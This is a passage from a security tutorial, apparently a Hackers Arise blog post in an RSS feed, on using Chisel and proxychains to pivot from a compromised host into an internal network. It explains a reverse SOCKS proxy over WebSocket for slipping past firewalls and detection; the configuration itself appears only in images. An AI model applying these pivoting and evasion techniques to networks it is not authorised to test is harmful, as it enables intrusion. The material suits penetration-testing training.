<p id="0kyxx48885">The primary objective here is to pivot from a compromised machine (the Chisel client) to explore and access resources within an internal network. By setting up a reverse SOCKS proxy over a WebSocket connection, several goals can be achieved: First, WebSocket traffic, which resembles normal HTTP traffic, can bypass restrictive firewalls and detection mechanisms. Second, network pivoting becomes possible, allowing tools such as Nmap, web browsers, or reconnaissance utilities to route traffic through the SOCKS proxy, effectively enabling exploration of internal systems as if the client were directly within the target network.</p>
<p id="if2r651657">To forward the connection to the new target from the Kali or attacker’s machine, we need to configure the <strong>proxychains.conf</strong> file.</p>
<p id="ag7t548891">Here’s what the configuration should look like:</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="415" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_proxychains_conf.avif" alt="" class="wp-image-15637" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_proxychains_conf.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_proxychains_conf-300x168.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p id="bo8wm52271">By doing this, you are configuring ProxyChains to forward traffic through the SOCKS proxy that Chisel has established, which is listening on port 1080.</p>
<h2 class="wp-block-heading" id="jygcq52359"><strong>Reason for Adding the Chisel Server to ProxyChains: SOCKS Proxy Configuration</strong></h2>
<p id="vb8vn52559">Chisel creates a SOCKS5 proxy, which allows traffic to be routed through the compromised machine or network where Chisel is running. This configuration ensures that all traffic passing through ProxyChains is forwarded via the Chisel SOCKS5 proxy.</p>
<h2 class="wp-block-heading" id="uziie52363"><strong>Purpose: Pivoting and Lateral Movement</strong></h2>
<p id="982j053128">With this setup, you can pivot into the internal network through the compromised host. Any tool or application configured to use ProxyChains will have its traffic routed through the Chisel SOCKS5 proxy, enabling access to internal resources that were previously unreachable.</p>
<h2 class="wp-block-heading" id="k7c5q52367"><strong>How It Works:</strong></h2>
<p id="ccs7m52369">ProxyChains intercepts the traffic from applications (such as web browsers, Nmap, SQLmap, etc.) and forwards it to the specified proxy—in this case, the Chisel SOCKS5 proxy. This setup allows tools that are not inherently SOCKS-aware to communicate through the proxy, making them capable of routing traffic through the compromised network.</p>
<p id="epd3o52371">As we can see next, we have successfully reached our target:</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="386" src="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_reach_the_target.avif" alt="" class="wp-image-15638" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/chisel_reach_the_target.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/chisel_reach_the_target-300x156.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="2w4t454459"><strong>Summary:</strong></h2>
<p id="c9gm154555">In this article, we explore the challenges of pivoting during penetration tests or cyberwarfare operations, where gaining access to multiple systems within a network is critical. We introduce Chisel, a powerful tool that streamlines the pivoting process, enabling security professionals to efficiently navigate networks and extend their access to target environments.</p><p>The post <a href="https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/">Pivoting within the Network: Getting Started with Chisel</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/pivoting-within-the-network-getting-started-with-chisel/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
</channel>
</rss>